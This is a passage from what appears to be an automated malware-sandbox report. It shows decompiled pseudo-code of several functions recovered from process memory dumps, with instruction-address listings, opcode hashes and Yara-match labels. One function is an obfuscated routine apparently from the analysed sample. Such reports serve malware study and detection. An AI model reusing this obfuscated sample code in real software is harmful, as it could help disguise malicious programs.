											_push( *_t124);
											E033E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3497b9c; // 0x0
									_t92 = L033C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E033E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E033AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0343E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0343E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E033E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                          0x0343b8d9
                                          0x0343b8e4
                                          0x00000000
                                          0x0343b8e6
                                          0x0343b8f3
                                          0x0343b8f5
                                          0x0343b8f5
                                          0x0343b8f8
                                          0x0343b920
                                          0x0343b924
                                          0x0343b936
                                          0x0343b939
                                          0x0343b93d
                                          0x0343b948
                                          0x0343b9a0
                                          0x0343b9a0
                                          0x0343b9a4
                                          0x0343b9bf
                                          0x0343b9c4
                                          0x0343b9c6
                                          0x0343b9cd
                                          0x0343b9d1
                                          0x0343bad4
                                          0x0343bad8
                                          0x0343bada
                                          0x0343badc
                                          0x0343badc
                                          0x0343badf
                                          0x0343bae0
                                          0x0343bae2
                                          0x0343bae4
                                          0x0343baec
                                          0x0343baee
                                          0x0343baf0
                                          0x0343baf0
                                          0x0343baec
                                          0x0343bafb
                                          0x0343bafc
                                          0x0343bafe
                                          0x0343bb01
                                          0x0343bb01
                                          0x00000000
                                          0x0343bb06
                                          0x0343b9d7
                                          0x0343b9db
                                          0x0343b9db
                                          0x0343b9de
                                          0x0343b9de
                                          0x0343b9e4
                                          0x0343b9e7
                                          0x0343b9ea
                                          0x0343b9ec
                                          0x0343b9ef
                                          0x0343b9f3
                                          0x0343ba1b
                                          0x0343ba1b
                                          0x0343ba23
                                          0x0343ba24
                                          0x0343ba27
                                          0x0343ba2a
                                          0x0343ba2b
                                          0x0343ba2e
                                          0x0343ba30
                                          0x0343ba37
                                          0x0343ba3f
                                          0x0343ba9c
                                          0x0343baa2
                                          0x0343bb13
                                          0x0343bb15
                                          0x0343baae
                                          0x0343baae
                                          0x0343bab3
                                          0x0343bab5
                                          0x0343baba
                                          0x0343bac8
                                          0x0343bac8
                                          0x0343baba
                                          0x0343bacd
                                          0x0343bacf
                                          0x00000000
                                          0x0343bacf
                                          0x0343bb1a
                                          0x00000000
                                          0x0343bb1c
                                          0x0343baa7
                                          0x0343bb11
                                          0x00000000
                                          0x0343bb11
                                          0x0343baa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0343ba41
                                          0x0343ba41
                                          0x0343ba41
                                          0x0343ba58
                                          0x0343ba5d
                                          0x0343ba62
                                          0x00000000
                                          0x00000000
                                          0x0343ba64
                                          0x0343ba67
                                          0x0343ba68
                                          0x0343ba69
                                          0x0343ba6c
                                          0x0343ba6f
                                          0x0343ba71
                                          0x0343ba78
                                          0x0343ba80
                                          0x00000000
                                          0x00000000
                                          0x0343ba90
                                          0x0343ba90
                                          0x0343ba97
                                          0x00000000
                                          0x0343ba97
                                          0x0343b9f5
                                          0x0343b9f7
                                          0x0343b9f7
                                          0x0343b9fa
                                          0x0343ba03
                                          0x0343ba07
                                          0x0343ba0c
                                          0x0343ba10
                                          0x0343ba17
                                          0x00000000
                                          0x0343b9f7
                                          0x0343b9a6
                                          0x0343b9a8
                                          0x0343b9af
                                          0x0343b9b3
                                          0x00000000
                                          0x00000000
                                          0x0343b9b9
                                          0x00000000
                                          0x0343b9b9
                                          0x0343b94d
                                          0x0343b98f
                                          0x0343b995
                                          0x0343b999
                                          0x0343b960
                                          0x0343b967
                                          0x0343b968
                                          0x0343b96a
                                          0x00000000
                                          0x0343b96a
                                          0x0343b99b
                                          0x0343b99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0343b99e
                                          0x0343b951
                                          0x0343b954
                                          0x0343b95a
                                          0x0343b95e
                                          0x0343b972
                                          0x0343b979
                                          0x0343b97d
                                          0x0343b97f
                                          0x0343b980
                                          0x0343b982
                                          0x0343b984
                                          0x00000000
                                          0x0343b984
                                          0x00000000
                                          0x0343b926
                                          0x00000000
                                          0x0343b926

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44ebfb3c6d13b7c27a84b9b3d19a71be6969459fe299683997b78f8403b79ca6
                                          • Instruction ID: 6e365b1ad1df8d7f2537f309cbd8ef1ef98cc7459410d419e2eef68f0943789c
                                          • Opcode Fuzzy Hash: 44ebfb3c6d13b7c27a84b9b3d19a71be6969459fe299683997b78f8403b79ca6
                                          • Instruction Fuzzy Hash: F2713E36600B01AFD731DF14C880F26BBE5EF4A720F18492AE6658F6E0DB74E941CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03461002, Relevance: .2, Instructions: 198COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03461002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x3495898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x34958b0 = _t128;
								 *0x34958b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x34958b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x34958bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x34958bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x34958b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x3495898 = 7;
										return _t75;
									} else {
										 *0x3495898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x3495898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                          0x03461002
                                          0x0346100c
                                          0x0346100f
                                          0x03461012
                                          0x03461018
                                          0x00000000
                                          0x0346102e
                                          0x03461030
                                          0x00000000
                                          0x03461032
                                          0x03461032
                                          0x03461038
                                          0x03461038
                                          0x0346121e
                                          0x034611ff
                                          0x03461205
                                          0x03461207
                                          0x0346120c
                                          0x0346120e
                                          0x03461210
                                          0x03461212
                                          0x03461212
                                          0x03461210
                                          0x0346121c
                                          0x0346121c
                                          0x03461228
                                          0x03461228
                                          0x0346101c
                                          0x0346101c
                                          0x0346101c
                                          0x0346101f
                                          0x03461022
                                          0x03461025
                                          0x0346102c
                                          0x0346102c
                                          0x00000000
                                          0x0346102c
                                          0x03461027
                                          0x0346102a
                                          0x0346103f
                                          0x0346103f
                                          0x03461042
                                          0x03461044
                                          0x03461047
                                          0x03461049
                                          0x0346104c
                                          0x0346104e
                                          0x03461088
                                          0x03461088
                                          0x0346108a
                                          0x0346108d
                                          0x0346108f
                                          0x03461091
                                          0x03461091
                                          0x03461093
                                          0x03461095
                                          0x03461097
                                          0x034610c8
                                          0x034610cb
                                          0x034610ce
                                          0x034610d0
                                          0x034610f4
                                          0x034610f4
                                          0x034610fa
                                          0x03461100
                                          0x03461102
                                          0x03461150
                                          0x03461150
                                          0x03461154
                                          0x03461167
                                          0x0346116a
                                          0x0346116a
                                          0x03461156
                                          0x03461156
                                          0x03461158
                                          0x0346115b
                                          0x0346115d
                                          0x0346115f
                                          0x0346115f
                                          0x0346115f
                                          0x03461162
                                          0x03461162
                                          0x0346116c
                                          0x0346116f
                                          0x03461171
                                          0x0346117b
                                          0x0346117b
                                          0x0346117d
                                          0x03461183
                                          0x03461183
                                          0x03461186
                                          0x03461188
                                          0x03461199
                                          0x0346118a
                                          0x0346118a
                                          0x0346118c
                                          0x0346118f
                                          0x03461191
                                          0x03461191
                                          0x03461191
                                          0x03461194
                                          0x03461194
                                          0x0346119c
                                          0x034611a2
                                          0x034611a8
                                          0x034611ac
                                          0x034611af
                                          0x034611c7
                                          0x034611b1
                                          0x034611b1
                                          0x034611b4
                                          0x034611b7
                                          0x034611b9
                                          0x034611b9
                                          0x034611b9
                                          0x034611bc
                                          0x034611c2
                                          0x034611c2
                                          0x034611cb
                                          0x034611ce
                                          0x034611d4
                                          0x034611e7
                                          0x034611ed
                                          0x034611ef
                                          0x00000000
                                          0x00000000
                                          0x034611f1
                                          0x00000000
                                          0x034611d6
                                          0x034611d6
                                          0x00000000
                                          0x034611d6
                                          0x034611d4
                                          0x03461104
                                          0x03461106
                                          0x00000000
                                          0x00000000
                                          0x03461108
                                          0x0346110c
                                          0x0346111d
                                          0x0346110e
                                          0x0346110e
                                          0x03461110
                                          0x03461113
                                          0x03461115
                                          0x03461115
                                          0x03461115
                                          0x03461118
                                          0x03461118
                                          0x03461126
                                          0x0346113a
                                          0x0346113d
                                          0x0346113f
                                          0x00000000
                                          0x03461141
                                          0x03461141
                                          0x00000000
                                          0x03461141
                                          0x0346113f
                                          0x034610d6
                                          0x034610d9
                                          0x034610dd
                                          0x034610e3
                                          0x034610e6
                                          0x034610e9
                                          0x00000000
                                          0x00000000
                                          0x034610ee
                                          0x034610f0
                                          0x034610f2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034610f2
                                          0x00000000
                                          0x03461099
                                          0x03461099
                                          0x0346109c
                                          0x0346109c
                                          0x0346109e
                                          0x034610a0
                                          0x034610b3
                                          0x034610a2
                                          0x034610a2
                                          0x034610a4
                                          0x034610a7
                                          0x034610a9
                                          0x034610ab
                                          0x034610ab
                                          0x034610ab
                                          0x034610ae
                                          0x034610ae
                                          0x034610b6
                                          0x034610b9
                                          0x00000000
                                          0x00000000
                                          0x034610be
                                          0x034610c1
                                          0x034610c3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x034610c3
                                          0x034610c5
                                          0x00000000
                                          0x034610c5
                                          0x03461097
                                          0x03461050
                                          0x03461053
                                          0x03461056
                                          0x03461059
                                          0x0346105c
                                          0x0346105e
                                          0x03461060
                                          0x03461062
                                          0x03461064
                                          0x03461064
                                          0x03461062
                                          0x03461066
                                          0x03461069
                                          0x0346106b
                                          0x0346106d
                                          0x0346106f
                                          0x03461076
                                          0x03461076
                                          0x03461076
                                          0x00000000
                                          0x03461076
                                          0x03461071
                                          0x03461074
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03461074
                                          0x03461079
                                          0x03461079
                                          0x0346107b
                                          0x0346107b
                                          0x0346107f
                                          0x03461082
                                          0x03461085
                                          0x00000000
                                          0x03461085
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ab45820c05aae61b4eebd5037aa836f71450bd940ed41a7e7ac7183a6f7a845
                                          • Instruction ID: 19c48c16410c6f8606abe2e6ee27a3539b08d5a32765ef0e2e4249e8b051051d
                                          • Opcode Fuzzy Hash: 1ab45820c05aae61b4eebd5037aa836f71450bd940ed41a7e7ac7183a6f7a845
                                          • Instruction Fuzzy Hash: B2718C74A00A62CFCB24CF66C49067AF3F1FB48301B6848AFD9929F740D775A951CB5A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E066, Relevance: .2, Instructions: 170COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E0041E066(signed int __eax, signed char __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				void* _v3;
				void* _t23;
				signed char _t27;
				signed char _t29;
				signed char _t31;
				signed int _t33;
				signed int _t39;
				void* _t46;
				signed int _t49;
				signed int _t60;
				signed int _t63;

				_t49 = __esi;
				_t46 = __edi;
				_t44 = __edx;
				_t39 = __ecx;
				_t31 = __ebx;
				_t19 = __eax;
				_t56 = _t60;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									do {
										do {
											do {
												L1:
												_t39 = _t39 |  *0x939ff7b7;
												 *0x8f83e7b0 =  *0x8f83e7b0 << 0xc0;
											} while ( *0x8f83e7b0 == 0);
											_pop( *0xdc624d74);
											 *0xc419e217 =  *0xc419e217 << 0xe5;
											 *0x84e5c4bb =  *0x84e5c4bb + _t44;
										} while ( *0x84e5c4bb != 0);
										_t44 = _t44 ^  *0x73aeb002;
										_t60 = _t60 ^  *0x2f9d1616;
										 *0xc1ddbd1c =  *0xc1ddbd1c - _t31;
										 *0xe0cc32b2 =  *0xe0cc32b2 + 0xefca2585;
										asm("rol byte [0xa616efa8], 0x66");
										_t31 = _t31 & 0x000000c6;
										_t56 =  &_v3;
										_t19 = 0x2e108c9c;
										_t39 = _t39 -  *0xa8e0cc32;
										_t46 = _t46 - 0xc83916ef;
									} while (_t46 != 0);
									_t19 =  *0x997775;
									 *0x997775 = 0x2e108c9c;
									 *0xd8a8c4a8 =  *0xd8a8c4a8 - _t39;
									_t56 =  &_v3;
									asm("sbb eax, [0x8b7a16ef]");
									 *0xc68ff209 =  *0xc68ff209 + _t31;
									asm("adc [0xe0cc32c1], eax");
									asm("adc [0xc83816ef], eax");
								} while (_t19 != 0xa8);
								asm("sbb [0x52173a7b], esi");
								_t23 = _t19 + 1;
								 *0x81d04116 =  *0x81d04116 << 0xc7;
								asm("ror byte [0x4052173a], 0x30");
								_t44 = _t44 | 0x81c42916;
								_push(_t23 -  *0xef45d88d);
								 *0xaddd0fb4 =  *0xaddd0fb4 & _t44;
								_t33 = _t31 -  *0xef45d88d - 0xef45d88d;
								 *0x87dbae16 =  *0x87dbae16 << 0x28;
								_pop( *0xa1e75531);
								 *0xef453d99 =  *0xef453d99 ^ _t33;
								asm("sbb eax, [0xfd32ee16]");
								_t19 = 0x22;
								asm("rcl dword [0xefa8e0cc], 0x44");
								_t39 = _t39 |  *0x4052173a |  *0xc1efbe0b;
								 *0xa8e0cc32 =  *0xa8e0cc32 >> 0xee;
								asm("adc esi, [0x2f8a16ef]");
								_t60 = _t60 &  *0xef45d88d |  *0x1c6d2b16 |  *0xddbe17ff;
								 *0xe0cc32bf = _t23;
								 *0xff16efa8 =  *0xff16efa8 - 0x10;
								 *0xc62b7093 = _t23;
								 *0xcc32c5f7 =  *0xcc32c5f7 - _t60;
								asm("sbb [0x16efa8e0], bh");
								 *0x4fa34f2 =  *0x4fa34f2 ^ _t39;
								_t31 = _t33 - 0x831db40f + 0xefa8e0cc;
								asm("adc ebp, [0xb3c62116]");
								_t56 =  &_v3 &  *0x9cba1d16 |  *0xd601ee67;
								asm("sbb [0x49395fc0], edi");
								asm("ror byte [0xa2f716d2], 0x1c");
							} while (_t56 <= 0);
							_push( *0x395f828e);
							 *0x36b616d2 =  *0x36b616d2 - _t44;
							asm("sbb dl, 0xe2");
							asm("rol dword [0xce9d8d8c], 0x24");
							asm("scasb");
							 *0xa8e0cc32 =  *0xa8e0cc32 << 0x31;
							asm("ror dword [0xd79c0126], 0x64");
							asm("adc eax, [0xf2ba16ef]");
							 *0xf9af869a =  *0xf9af869a | 0x22;
							asm("sbb [0x395fc3cc], ebp");
							 *0x420816d2 =  *0x420816d2 | 0x22;
							_t63 = _t60 | 0xf2c1ab9c;
							 *0x416efa8 =  *0x416efa8 << 0x24;
							 *0xbda7983e =  *0xbda7983e - _t63;
							_t27 = 0x22 |  *0x5fbed3f5;
							asm("sbb [0x71c621c], cl");
							asm("movsb");
							 *0xcc32c1db =  *0xcc32c1db + _t27;
							_t56 = _t56 &  *0xc4a8009a;
							asm("adc [0x99d1b49b], edx");
							 *0x49395fa8 = _t44 ^ 0x9e8e16ef;
							_t49 = ((_t49 - 0xe2aa9076 & 0xe0cc32cc &  *0x16d24939) + 0x7c73a2fe |  *0xa0f4be16) & 0xc1dec32e;
							_t39 = (_t39 ^  *0xef45d8a8) &  *0xa0470c16;
							_t44 = 0xb4;
							_t19 = _t27 |  *0xc2ccecc9;
							_pop(_t46);
							 *0x3ccdc486 =  *0x3ccdc486 ^ _t19;
							_t60 = _t63 ^  *0x32c1ddbd;
							 *0xefa8e0cc =  *0xefa8e0cc & _t49;
							 *0x93b70016 =  *0x93b70016 & _t60;
							_t31 = (0x000000a8 ^  *0xe0cc32ba) - 1;
						} while (_t31 < 0);
						 *0xaf88ac70 =  *0xaf88ac70 ^ _t19;
						_pop(_t46);
						asm("adc [0x16d24939], eax");
						asm("ror byte [0x54942410], 0x95");
						asm("sbb bl, [0xaddd0fb4]");
						asm("ror dword [0xef45d88d], 0xb7");
						_t19 =  *0x90e04c16;
					} while ( *0xaf88ac70 > 0);
					_t49 = _t49 - 0x45d8a8c4;
					asm("ror dword [0x9e3f16ef], 0xad");
					asm("ror dword [0xf9e2bc0], 0xc4");
					_t19 =  *0x826380d6;
					 *0xa8c4a800 =  *0xa8c4a800 ^ 0x000000b4;
					_t44 = 0x90;
					_t39 = _t39 |  *0x2bbc121f;
					asm("rol dword [0xb2a10f9e], 0xac");
					 *0x49395fc2 =  *0x49395fc2 & _t49;
					asm("adc cl, 0xd2");
					asm("adc ebp, [0x33941616]");
					_t60 = 0xc1dec32e;
					asm("sbb dl, [0xa8e0cc32]");
					asm("rcr byte [0xd8a8c4a8], 0x78");
					_t56 =  &_v3;
					_t31 =  *0xd6b616ef;
				} while ( &_v3 < 0);
				_pop( *0x52173a78);
				_t29 = _t19 + 1;
				_push(_t29);
				 *0xef45d88d =  *0xef45d88d & _t39;
				return _t29 | 0x00000016;
			}














                                          0x0041e066
                                          0x0041e066
                                          0x0041e066
                                          0x0041e066
                                          0x0041e066
                                          0x0041e066
                                          0x0041e067
                                          0x0041e067
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e069
                                          0x0041e06f
                                          0x0041e06f
                                          0x0041e078
                                          0x0041e07e
                                          0x0041e085
                                          0x0041e085
                                          0x0041e096
                                          0x0041e0a8
                                          0x0041e0ae
                                          0x0041e0c6
                                          0x0041e0cc
                                          0x0041e0d3
                                          0x0041e0d6
                                          0x0041e0d7
                                          0x0041e0dc
                                          0x0041e0e2
                                          0x0041e0e2
                                          0x0041e0ee
                                          0x0041e0ee
                                          0x0041e0f4
                                          0x0041e0fa
                                          0x0041e0fb
                                          0x0041e101
                                          0x0041e107
                                          0x0041e10f
                                          0x0041e10f
                                          0x0041e11b
                                          0x0041e121
                                          0x0041e129
                                          0x0041e130
                                          0x0041e13e
                                          0x0041e14a
                                          0x0041e158
                                          0x0041e15e
                                          0x0041e164
                                          0x0041e16d
                                          0x0041e173
                                          0x0041e179
                                          0x0041e185
                                          0x0041e188
                                          0x0041e195
                                          0x0041e19b
                                          0x0041e1a2
                                          0x0041e1a8
                                          0x0041e1ae
                                          0x0041e1b4
                                          0x0041e1ba
                                          0x0041e1c0
                                          0x0041e1c6
                                          0x0041e1cc
                                          0x0041e1d8
                                          0x0041e1de
                                          0x0041e1e4
                                          0x0041e1ea
                                          0x0041e1f0
                                          0x0041e1f0
                                          0x0041e203
                                          0x0041e20a
                                          0x0041e222
                                          0x0041e225
                                          0x0041e22c
                                          0x0041e22d
                                          0x0041e23a
                                          0x0041e249
                                          0x0041e24f
                                          0x0041e255
                                          0x0041e25c
                                          0x0041e262
                                          0x0041e26e
                                          0x0041e275
                                          0x0041e27b
                                          0x0041e287
                                          0x0041e28d
                                          0x0041e28e
                                          0x0041e2a0
                                          0x0041e2b2
                                          0x0041e2b8
                                          0x0041e2c6
                                          0x0041e2d5
                                          0x0041e2db
                                          0x0041e2dd
                                          0x0041e2e3
                                          0x0041e2ea
                                          0x0041e2f0
                                          0x0041e2f6
                                          0x0041e2fc
                                          0x0041e302
                                          0x0041e302
                                          0x0041e309
                                          0x0041e30f
                                          0x0041e310
                                          0x0041e316
                                          0x0041e31d
                                          0x0041e323
                                          0x0041e32a
                                          0x0041e32a
                                          0x0041e33b
                                          0x0041e341
                                          0x0041e348
                                          0x0041e35b
                                          0x0041e360
                                          0x0041e366
                                          0x0041e36c
                                          0x0041e372
                                          0x0041e38b
                                          0x0041e391
                                          0x0041e394
                                          0x0041e39a
                                          0x0041e3a0
                                          0x0041e3b1
                                          0x0041e3b8
                                          0x0041e3b9
                                          0x0041e3b9
                                          0x0041e3c5
                                          0x0041e3cb
                                          0x0041e3cc
                                          0x0041e3cd
                                          0x0041e3d5

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f56bfd52d3446504060d36c489ee6e565b6100e0b6e5d5ff7b55f61ead7de6be
                                          • Instruction ID: fd367a8e075f5df0fbc37e1bd3c1ead738c0cbcbcb89c2f76196ffd75064e1b2
                                          • Opcode Fuzzy Hash: f56bfd52d3446504060d36c489ee6e565b6100e0b6e5d5ff7b55f61ead7de6be
                                          • Instruction Fuzzy Hash: 0281417684C3D1DFE701DF78E89A6863FB1F70A330748068EC9A28B192D77411AACB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
